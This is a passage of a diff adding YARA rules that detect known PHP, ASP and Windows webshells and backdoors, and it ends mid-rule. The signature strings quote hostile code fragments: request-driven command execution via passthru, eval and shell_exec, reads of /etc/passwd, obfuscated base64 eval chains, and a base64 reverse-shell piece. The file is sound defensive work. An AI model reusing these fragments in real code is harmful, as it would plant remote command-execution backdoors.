+		$s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</"
+		$s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh"
+		$s11 = " *   Coded by Pixcher" fullword
+		$s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword
+	condition:
+		2 of them
+}
+rule WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah {
+	meta:
+		description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82"
+		hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429"
+		hash2 = "16fa789b20409c1f2ffec74484a30d0491904064"
+	strings:
+		$s1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword
+		$s2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword
+		$s3 = "$dt = $_POST['filecontent'];" fullword
+		$s4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword
+		$s6 = "print \"Sorry, none of the command functions works.\";" fullword
+		$s11 = "document.cmdform.command.value='';" fullword
+		$s12 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST"
+	condition:
+		3 of them
+}
+rule WebShell_Generic_PHP_7 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "de98f890790756f226f597489844eb3e53a867a9"
+		hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"
+		hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"
+		hash3 = "715f17e286416724e90113feab914c707a26d456"
+	strings:
+		$s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword
+		$s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword
+		$s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword
+		$s4 = "if( $action == \"dumpTable\" )" fullword
+	condition:
+		2 of them
+}
+rule WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall {
+	meta:
+		description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "b148ead15d34a55771894424ace2a92983351dda"
+		hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"
+		hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"
+		hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"
+	strings:
+		$s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword
+		$s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword
+		$s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword
+		$s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Generic_PHP_8 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Macker's Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99"
+		hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e"
+		hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3"
+	strings:
+		$s1 = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword
+		$s2 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+		$s3 = "/* I added this to ensure the script will run correctly..." fullword
+		$s14 = "<!--    </form>   -->" fullword
+		$s15 = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword
+		$s20 = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword
+	condition:
+		3 of them
+}
+rule WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
+		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
+		hash3 = "4f83bc2836601225a115b5ad54496428a507a361"
+	strings:
+		$s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword
+		$s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword
+		$s6 = "onfocus=\"if (this.value == 'Kullan" fullword
+		$s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">"
+	condition:
+		2 of them
+}
+rule WebShell_Generic_PHP_9 {
+	meta:
+		description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18"
+		hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"
+		hash2 = "0daed818cac548324ad0c5905476deef9523ad73"
+	strings:
+		$s2 = ":<b>\" .base64_decode($_POST['tot']). \"</b>\";" fullword
+		$s6 = "if (isset($_POST['wq']) && $_POST['wq']<>\"\") {" fullword
+		$s12 = "if (!empty($_POST['c'])){" fullword
+		$s13 = "passthru($_POST['c']);" fullword
+		$s16 = "<input type=\"radio\" name=\"tac\" value=\"1\">B64 Decode<br>" fullword
+		$s20 = "<input type=\"radio\" name=\"tac\" value=\"3\">md5 Hash" fullword
+	condition:
+		3 of them
+}
+rule WebShell__PH_Vayv_PHVayv_PH_Vayv {
+	meta:
+		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
+		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
+	strings:
+		$s4 = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle"
+		$s12 = "<? if ($ekinci==\".\" or  $ekinci==\"..\") {" fullword
+		$s17 = "name=\"duzenx2\" value=\"Klas" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Generic_PHP_1 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b"
+		hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"
+		hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"
+		hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"
+	strings:
+		$s1 = "$token = substr($_REQUEST['command'], 0, $length);" fullword
+		$s4 = "var command_hist = new Array(<?php echo $js_command_hist ?>);" fullword
+		$s7 = "$_SESSION['output'] .= htmlspecialchars(fgets($io[1])," fullword
+		$s9 = "document.shell.command.value = command_hist[current_line];" fullword
+		$s16 = "$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $"
+		$s19 = "if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {" fullword
+		$s20 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword
+	condition:
+		5 of them
+}
+rule WebShell_Generic_PHP_2 {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword
+		$s4 = "\\$port = {$_POST['port']};" fullword
+		$s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword
+		$s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u"
+		$s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]"
+	condition:
+		4 of them
+}
+rule WebShell__CrystalShell_v_1_erne_stres {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687"
+		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s1 = "<input type='submit' value='  open (shill.txt) '>" fullword
+		$s4 = "var_dump(curl_exec($ch));" fullword
+		$s7 = "if(empty($_POST['Mohajer22'])){" fullword
+		$s10 = "$m=$_POST['curl'];" fullword
+		$s13 = "$u1p=$_POST['copy'];" fullword
+		$s14 = "if(empty(\\$_POST['cmd'])){" fullword
+		$s15 = "$string = explode(\"|\",$string);" fullword
+		$s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword
+	condition:
+		5 of them
+}
+rule WebShell_Generic_PHP_3 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4"
+		hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be"
+		hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976"
+		hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289"
+	strings:
+		$s0 = "header('Content-Length:'.filesize($file).'');" fullword
+		$s4 = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma"
+		$s7 = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword
+		$s14 = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword
+		$s20 = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_4 {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d"
+		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+		$s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword
+		$s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword
+		$s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword
+		$s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword
+		$s10 = "foreach ($arr as $filename) {" fullword
+		$s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_5 {
+	meta:
+		description = "PHP Webshells Github Archive - from files ex0shell.php, megabor.php, GRP WebShell 2.0 release build 2018 (C)2006,Great.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "64461ad8d8f23ea078201a31d747157f701a4e00"
+		hash1 = "3df1afbcfa718da6fc8af27554834ff6d1a86562"
+		hash2 = "ad86ef7f24f75081318146edc788e5466722a629"
+	strings:
+		$s0 = "(($perms & 0x0400) ? 'S' : '-'));" fullword
+		$s10 = "} elseif (($perms & 0x8000) == 0x8000) {" fullword
+		$s11 = "if (($perms & 0xC000) == 0xC000) {" fullword
+		$s12 = "$info .= (($perms & 0x0008) ?" fullword
+		$s16 = "// Block special" fullword
+		$s18 = "$info = 's';" fullword
+	condition:
+		all of them
+}
+rule WebShell_GFS {
+	meta:
+		description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c"
+		hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822"
+		hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50"
+	strings:
+		$s0 = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword
+		$s1 = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword
+		$s2 = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm"
+	condition:
+		all of them
+}
+rule WebShell__CrystalShell_v_1_sosyete_stres {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "e32405e776e87e45735c187c577d3a4f98a64059"
+		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s1 = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword
+		$s4 = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword
+		$s11 = "scrollbar-darkshadow-color: #101842;" fullword
+		$s15 = "<a bookmark=\"minipanel\">" fullword
+		$s16 = "background-color: #EBEAEA;" fullword
+		$s18 = "color: #D5ECF9;" fullword
+		$s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border"
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_10 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
+		hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57"
+	strings:
+		$s2 = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword
+		$s6 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword
+		$s11 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword
+		$s12 = "else if( $mode & 0xA000 ) " fullword
+		$s17 = "$s=sprintf(\"%1s\", $type); " fullword
+		$s20 = "font-size: 8pt;" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_11 {
+	meta:
+		description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf"
+		hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6"
+		hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351"
+		hash3 = "80aba3348434c66ac471daab949871ab16c50042"
+	strings:
+		$s5 = "$filename = $backupstring.\"$filename\";" fullword
+		$s6 = "while ($file = readdir($folder)) {" fullword
+		$s7 = "if($file != \".\" && $file != \"..\")" fullword
+		$s9 = "$backupstring = \"copy_of_\";" fullword
+		$s10 = "if( file_exists($file_name))" fullword
+		$s13 = "global $file_name, $filename;" fullword
+		$s16 = "copy($file,\"$filename\");" fullword
+		$s18 = "<td width=\"49%\" height=\"142\">" fullword
+	condition:
+		all of them
+}
+rule WebShell__findsock_php_findsock_shell_php_reverse_shell {
+	meta:
+		description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f"
+		hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"
+		hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"
+	strings:
+		$s1 = "// me at pentestmonkey@pentestmonkey.net" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_6 {
+	meta:
+		description = "PHP Webshells Github Archive - from files c0derz shell [csh] v. 0.1.1 release.php, CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "1a08f5260c4a2614636dfc108091927799776b13"
+		hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s2 = "@eval(stripslashes($_POST['phpcode']));" fullword
+		$s5 = "echo shell_exec($com);" fullword
+		$s7 = "if($sertype == \"winda\"){" fullword
+		$s8 = "function execute($com)" fullword
+		$s12 = "echo decode(execute($cmd));" fullword
+		$s15 = "echo system($com);" fullword
+	condition:
+		4 of them
+}
+
+rule Unpack_Injectt {
+	meta:
+		description = "Webshells Auto-generated - file Injectt.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8a5d2158a566c87edc999771e12d42c5"
+	strings:
+		$s2 = "%s -Run                              -->To Install And Run The Service"
+		$s3 = "%s -Uninstall                        -->To Uninstall The Service"
+		$s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_fso {
+	meta:
+		description = "Webshells Auto-generated - file fso.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b37f3cde1a08890bd822a182c3a881f6"
+	strings:
+		$s0 = "<!-- PageFSO Below -->"
+		$s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_ssh {
+	meta:
+		description = "Webshells Auto-generated - file ssh.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1aa5307790d72941589079989b4f900e"
+	strings:
+		$s0 = "eval(gzinflate(str_rot13(base64_decode('"
+	condition:
+		all of them
+}
+rule Debug_BDoor {
+	meta:
+		description = "Webshells Auto-generated - file BDoor.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "e4e8e31dd44beb9320922c5f49739955"
+	strings:
+		$s1 = "\\BDoor\\"
+		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
+	condition:
+		all of them
+}
+rule bin_Client {
+	meta:
+		description = "Webshells Auto-generated - file Client.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5f91a5b46d155cacf0cc6673a2a5461b"
+	strings:
+		$s0 = "Recieved respond from server!!"
+		$s4 = "packet door client"
+		$s5 = "input source port(whatever you want):"
+		$s7 = "Packet sent,waiting for reply..."
+	condition:
+		all of them
+}
+rule ZXshell2_0_rar_Folder_ZXshell {
+	meta:
+		description = "Webshells Auto-generated - file ZXshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "246ce44502d2f6002d720d350e26c288"
+	strings:
+		$s0 = "WPreviewPagesn"
+		$s1 = "DA!OLUTELY N"
+	condition:
+		all of them
+}
+rule RkNTLoad {
+	meta:
+		description = "Webshells Auto-generated - file RkNTLoad.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "262317c95ced56224f136ba532b8b34f"
+	strings:
+		$s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+		$s2 = "5pur+virtu!"
+		$s3 = "ugh spac#n"
+		$s4 = "xcEx3WriL4"
+		$s5 = "runtime error"
+		$s6 = "loseHWait.Sr."
+		$s7 = "essageBoxAw"
+		$s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $"
+	condition:
+		all of them
+}
+rule binder2_binder2 {
+	meta:
+		description = "Webshells Auto-generated - file binder2.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d594e90ad23ae0bc0b65b59189c12f11"
+	strings:
+		$s0 = "IsCharAlphaNumericA"
+		$s2 = "WideCharToM"
+		$s4 = "g 5pur+virtu!"
+		$s5 = "\\syslog.en"
+		$s6 = "heap7'7oqk?not="
+		$s8 = "- Kablto in"
+	condition:
+		all of them
+}
+rule thelast_orice2 {
+	meta:
+		description = "Webshells Auto-generated - file orice2.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "aa63ffb27bde8d03d00dda04421237ae"
+	strings:
+		$s0 = " $aa = $_GET['aa'];"
+		$s1 = "echo $aa;"
+	condition:
+		all of them
+}
+rule FSO_s_sincap {
+	meta:
+		description = "Webshells Auto-generated - file sincap.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dc5c2c2392b84a1529abd92e98e9aa5b"
+	strings:
+		$s0 = "    <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">"
+		$s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin="
+	condition:
+		all of them
+}
+rule PhpShell {
+	meta:
+		description = "Webshells Auto-generated - file PhpShell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "539baa0d39a9cf3c64d65ee7a8738620"
+	strings:
+		$s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>."
+	condition:
+		all of them
+}
+rule HYTop_DevPack_config {
+	meta:
+		description = "Webshells Auto-generated - file config.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b41d0e64e64a685178a3155195921d61"
+	strings:
+		$s0 = "const adminPassword=\""
+		$s2 = "const userPassword=\""
+		$s3 = "const mVersion="
+	condition:
+		all of them
+}
+rule sendmail {
+	meta:
+		description = "Webshells Auto-generated - file sendmail.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "75b86f4a21d8adefaf34b3a94629bd17"
+	strings:
+		$s3 = "_NextPyC808"
+		$s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)"
+	condition:
+		all of them
+}
+rule FSO_s_zehir4 {
+	meta:
+		description = "Webshells Auto-generated - file zehir4.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5b496a61363d304532bcf52ee21f5d55"
+	strings:
+		$s5 = " byMesaj "
+	condition:
+		all of them
+}
+rule hkshell_hkshell {
+	meta:
+		description = "Webshells Auto-generated - file hkshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "168cab58cee59dc4706b3be988312580"
+	strings:
+		$s1 = "PrSessKERNELU"
+		$s2 = "Cur3ntV7sion"
+		$s3 = "Explorer8"
+	condition:
+		all of them
+}
+rule iMHaPFtp {
+	meta:
+		description = "Webshells Auto-generated - file iMHaPFtp.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "12911b73bc6a5d313b494102abcf5c57"
+	strings:
+		$s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">"
+	condition:
+		all of them
+}
+rule Unpack_TBack {
+	meta:
+		description = "Webshells Auto-generated - file TBack.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a9d1007823bf96fb163ab38726b48464"
+	strings:
+		$s5 = "\\final\\new\\lcc\\public.dll"
+	condition:
+		all of them
+}
+rule DarkSpy105 {
+	meta:
+		description = "Webshells Auto-generated - file DarkSpy105.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f0b85e7bec90dba829a3ede1ab7d8722"
+	strings:
+		$s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!"
+	condition:
+		all of them
+}
+rule EditServer_Webshell {
+	meta:
+		description = "Webshells Auto-generated - file EditServer.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f945de25e0eba3bdaf1455b3a62b9832"
+	strings:
+		$s2 = "Server %s Have Been Configured"
+		$s5 = "The Server Password Exceeds 32 Characters"
+		$s8 = "9--Set Procecess Name To Inject DLL"
+	condition:
+		all of them
+}
+rule FSO_s_reader {
+	meta:
+		description = "Webshells Auto-generated - file reader.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b598c8b662f2a1f6cc61f291fb0a6fa2"
+	strings:
+		$s2 = "mailto:mailbomb@hotmail."
+	condition:
+		all of them
+}
+rule ASP_CmdAsp {
+	meta:
+		description = "Webshells Auto-generated - file CmdAsp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "79d4f3425f7a89befb0ef3bafe5e332f"
+	strings:
+		$s2 = "' -- Read the output from our command and remove the temp file -- '"
+		$s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+		$s9 = "' -- create the COM objects that we will be using -- '"
+	condition:
+		all of them
+}
+rule KA_uShell {
+	meta:
+		description = "Webshells Auto-generated - file KA_uShell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "685f5d4f7f6751eaefc2695071569aab"
+	strings:
+		$s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass"
+		$s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}"
+	condition:
+		all of them
+}
+rule PHP_Backdoor_v1 {
+	meta:
+		description = "Webshells Auto-generated - file PHP Backdoor v1.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0506ba90759d11d78befd21cabf41f3d"
+	strings:
+
+		$s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th"
+		$s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy"
+	condition:
+		all of them
+}
+rule svchostdll {
+	meta:
+		description = "Webshells Auto-generated - file svchostdll.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0f6756c8cb0b454c452055f189e4c3f4"
+	strings:
+		$s0 = "InstallService"
+		$s1 = "RundllInstallA"
+		$s2 = "UninstallService"
+		$s3 = "&G3 Users In RegistryD"
+		$s4 = "OL_SHUTDOWN;I"
+		$s5 = "SvcHostDLL.dll"
+		$s6 = "RundllUninstallA"
+		$s7 = "InternetOpenA"
+		$s8 = "Check Cloneomplete"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_server {
+	meta:
+		description = "Webshells Auto-generated - file server.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1d38526a215df13c7373da4635541b43"
+	strings:
+		$s0 = "<!-- PageServer Below -->"
+	condition:
+		all of them
+}
+rule vanquish {
+	meta:
+		description = "Webshells Auto-generated - file vanquish.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "684450adde37a93e8bb362994efc898c"
+	strings:
+		$s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged"
+		$s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU"
+		$s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z"
+	condition:
+		all of them
+}
+rule winshell {
+	meta:
+		description = "Webshells Auto-generated - file winshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3144410a37dd4c29d004a814a294ea26"
+	strings:
+		$s0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices"
+		$s1 = "WinShell Service"
+		$s2 = "__GLOBAL_HEAP_SELECTED"
+		$s3 = "__MSVCRT_HEAP_SELECT"
+		$s4 = "Provide Windows CmdShell Service"
+		$s5 = "URLDownloadToFileA"
+		$s6 = "RegisterServiceProcess"
+		$s7 = "GetModuleBaseNameA"
+		$s8 = "WinShell v5.0 (C)2002 janker.org"
+	condition:
+		all of them
+}
+rule FSO_s_remview {
+	meta:
+		description = "Webshells Auto-generated - file remview.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b4a09911a5b23e00b55abe546ded691c"
+	strings:
+		$s2 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""
+		$s3 = "         echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\""
